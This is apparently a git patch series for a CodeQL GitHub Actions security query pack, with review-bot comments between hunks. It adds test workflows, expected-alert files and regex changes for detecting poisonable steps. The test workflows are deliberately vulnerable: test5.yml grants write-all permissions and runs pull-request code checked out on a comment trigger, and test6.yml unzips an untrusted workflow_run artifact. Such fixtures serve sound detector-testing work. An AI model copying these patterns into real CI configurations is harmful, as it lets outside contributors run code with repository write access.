@@ -33,7 +31,36 @@ jobs: ref: ${{ fromJson(steps.issue.outputs.result).sha }} - run: bash comment_example/tests.sh - # test2 + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: - uses: actions/checkout@v4 with: submodules: recursive diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index 01045ddde5e..e2c4d966063 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
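Review bot: After the split into `test1`, `test2` and `test3`, this fixture no longer produces any row in the `#select` section of UntrustedCheckoutTOCTOUCritical.expected (the only comment.yml result is removed in this commit), yet nothing in the file says that zero alerts is the intended outcome. `test2` checks out the mutable `head.ref` behind the `author_association` condition while `test1` checks out the `sha`, which looks like a deliberate contrast that the test does not pin. A short comment per job would make the intent reviewable, for instance `# test2: mutable ref behind an author_association check - expected: no TOCTOU alert (reported by UntrustedCheckoutCritical instead)`, with the wording adjusted to the result that is actually intended. The `test1` job starts in the previous hunk.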
@@ -1,15 +1,12 @@ edges | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:30:9:34:6 | Uses Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:34:9:37:6 | Run Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:37:9:41:6 | Uses Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:41:9:41:43 | Run Step | -| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:34:9:37:6 | Run Step | -| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | -| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | -| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | -| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | -| .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | +| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:32:9:34:2 | Run Step | +| .github/workflows/comment.yml:28:9:32:6 | Uses Step | .github/workflows/comment.yml:32:9:34:2 | Run Step | +| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | +| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:58:9:60:2 | Run Step | +| .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | +| .github/workflows/comment.yml:64:9:68:6 | 
Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | 
@@ -19,7 +16,6 @@ edges | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | | .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | #select -| .github/workflows/comment.yml:41:9:41:43 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | | .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | | .github/workflows/deployment.yml:30:10:31:53 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | | .github/workflows/label.yml:17:9:17:41 | Run Step | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml new file mode 100644 index 00000000000..a4acd738766 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml 
@@ -0,0 +1,68 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + test1: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: 
bash comment_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml new file mode 100644 index 00000000000..f532e4266ad --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml @@ -0,0 +1,45 @@ +name: Test + + +on: + workflow_run: + workflows: ["Foo"] + types: + - completed + +jobs: + docker: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + outputs: + version-json: ${{ steps.show_versions.outputs.version-json }} + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{ github.event.workflow_run.id }}, + }); + var matchArtifactNacos = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "nacos" + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifactNacos.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/nacos.zip', Buffer.from(download.data)); + - run: | + unzip nacos.zip + mkdir nacos + cp -r nacos-* nacos/ + - name: save docker_2 images + run: | + mv ./build_backup/* nacos-e2e/cicd/build/ diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 87289c178af..78e2afa2747 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
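Review bot: This new fixture has the same blob id as the CWE-367 comment.yml in this commit (`a4acd738766`), so the two test workflows are byte-identical copies and will drift apart silently unless each records what it is meant to prove. In `test3` the ref is built from `github.event.number`, which as far as I know is not populated for the `issue_comment` trigger declared at the top (the number is under `github.event.issue.number`), so that job does not model a checkout that would resolve at run time. I would add a header comment such as `# expected: UntrustedCheckoutCritical on the run step of test1, test2 and test3`. Then either switch `test3` to `github.event.issue.number` or note that the expression is kept verbatim from the upstream example.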
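Review bot: Nothing in this fixture or in the visible expected-file hunks states which query it is meant to exercise. It downloads a `workflow_run` artifact with `actions/github-script` and unzips it into the workspace, but the only expected output that mentions test6.yml is the `edges` section of UntrustedCheckoutCritical.expected, with no `#select` row. If the file is meant as an artifact-poisoning case, a matching row in the ArtifactPoisoning expected output is missing from what is shown here; if it is a known gap, that should be written down. Suggested header: `# artifact downloaded via github-script then unzipped in place - expected: <query name / no alert yet>`.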
@@ -294,6 +294,16 @@ edges | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:28:9:32:6 | Uses Step | +| .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:32:9:34:2 | Run Step | +| .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | +| .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:54:9:58:6 | Uses Step | +| .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:58:9:60:2 | Run Step | +| .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | +| .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | +| .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:39:9:43:6 | Run Step | +| .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | +| .github/workflows/test6.yml:39:9:43:6 | Run Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -322,5 +332,8 @@ edges | .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 61c328b7011..e0164eafac8 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,5 +1,6 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 966a9b1652a6e4f635356fdc7bba27c69c5a2c6a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 4 Jul 2024 13:05:27 +0200 Subject: [PATCH 0377/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 34000094dd8..59ab88b42e4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.12 +version: 0.1.13 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5ccbc7b9657..f25fd70619f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.12 +version: 0.1.13 groups: [actions, queries] suites: codeql-suites extractor: javascript From e5064f80902240969b4269fa031f79cebd32bbf4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Jul 2024 18:16:50 +0200 Subject: [PATCH 0378/1267] Improve poisonable steps --- .../actions/security/PoisonableSteps.qll | 4 +- ql/lib/ext/config/poisonable_steps.yml | 1 + .../.github/workflows/poisonable_steps.yml | 25 ++ .../library-tests/poisonable_steps.expected | 18 ++ ql/test/library-tests/poisonable_steps.ql | 5 + ql/test/library-tests/test.expected | 241 ++++++++++++++++++ .../CWE-829/.github/workflows/test7.yml | 58 +++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 24 ++ 9 files changed, 376 insertions(+), 1 deletion(-) create mode 100644 ql/test/library-tests/.github/workflows/poisonable_steps.yml create mode 100644 ql/test/library-tests/poisonable_steps.expected create mode 100644 ql/test/library-tests/poisonable_steps.ql create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index dc0f3876f86..b0c6f7aa6a9 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -30,7 +30,9 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and //cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) - cmd = line.regexpCapture(".*(^|;|\\$\\(|`|\\|)\\s*" + regexp + "\\s*(;|\\||\\)|`|$).*", group) + cmd = + line.regexpCapture(".*(^|;|\\$\\(|`|\\||&&)\\s*" + regexp + "\\s*(;|\\||\\)|`|-|&&|$).*", + group) ) } 
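Review bot: The widened pattern in `LocalScriptExecutionRunStep` still relies on the wrapper's first group being a capturing group, which is why every visible row in poisonable_steps.yml uses group index `3` for the second group of its own expression. That coupling is undocumented, and the superseded pattern is left behind as a `//cmd = ...` comment. Two consequences of the new form deserve a comment or a test: the trailing `-` alternative accepts any text starting with a dash after the match, and the data-model `(.*)` groups are greedy, so `cmd` can include arguments or following commands rather than just the script path (how `cmd` is consumed is outside this hunk). I would delete the commented-out line and add `// group numbers in poisonableLocalScriptsDataModel count the leading separator group as 1`. The predicate this expression belongs to starts above the hunk.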
diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index f13a2a16d35..ff3df1f699c 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -58,6 +58,7 @@ extensions: data: # TODO: It could also be in the form of `dir/cmd` - ["(\\.\\/)(.*)", 3] + - ["(\\.\\s+)(.*)", 3] # eg: . venv/bin/activate - ["(source|sh|bash|zsh|fish)\\s+(.*)", 3] - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] - ["(python)\\s+(.*)\\.py", 3] diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml new file mode 100644 index 00000000000..3e31507cef1 --- /dev/null +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -0,0 +1,25 @@ +on: push + +jobs: + local_commands: + runs-on: ubuntu-latest + steps: + - run: venv/bin/activate # not supported yet + - run: . venv/bin/activate + - run: echo foo; . venv/bin/activate + - run: echo foo;. venv/bin/activate + - run: echo foo |. venv/bin/activate + - run: ./venv/bin/activate + - run: sh venv/bin/activate.sh + - run: echo $(sh venv/bin/activate.sh) + - run: echo foo; sh venv/bin/activate.sh; echo bar + - run: echo foo | sh venv/bin/activate.sh > output + - run: python venv/bin/activate.py + - run: echo foo; python venv/bin/activate.py + - run: pnpm run test:ct + - run: pip install nbformat && python scripts/generate_notebooks.py + - run: python scripts/generate_theme.py --outfile js/storybook/theme.css + - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css + - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css + + diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected new file mode 100644 index 00000000000..62ffff3c15c --- /dev/null +++ b/ql/test/library-tests/poisonable_steps.expected 
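Review bot: Every step in the new poisonable_steps.yml workflow except the first is a positive case, and the first (`venv/bin/activate # not supported yet`) is a known miss rather than a true negative. The test therefore cannot catch the new `(\\.\\s+)(.*)` row or the added `-`/`&&` delimiters starting to over-match. I would add a few steps that should stay unflagged, for example `- run: cat ./README.md` and `- run: ls . -la` (constructed examples). I would also mark the first step with `# expected: not flagged (known gap)` so the intent survives when the expected file is regenerated.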
@@ -0,0 +1,18 @@ +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | diff --git a/ql/test/library-tests/poisonable_steps.ql b/ql/test/library-tests/poisonable_steps.ql new file mode 100644 index 00000000000..1aacdd14d14 --- /dev/null +++ b/ql/test/library-tests/poisonable_steps.ql @@ -0,0 +1,5 @@ +import actions +import codeql.actions.security.PoisonableSteps + +from PoisonableStep step +select step diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index b09473fc132..efb0bca6952 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -1,21 +1,25 @@ files | .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | | .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs 
@@ -41,6 +45,23 @@ steps | .github/workflows/multiline.yml:71:9:78:6 | Run Step | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | 
@@ -69,6 +90,23 @@ runSteps | .github/workflows/multiline.yml:71:9:78:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| 
.github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | 
@@ -130,6 +168,23 @@ runStepChildren | .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. 
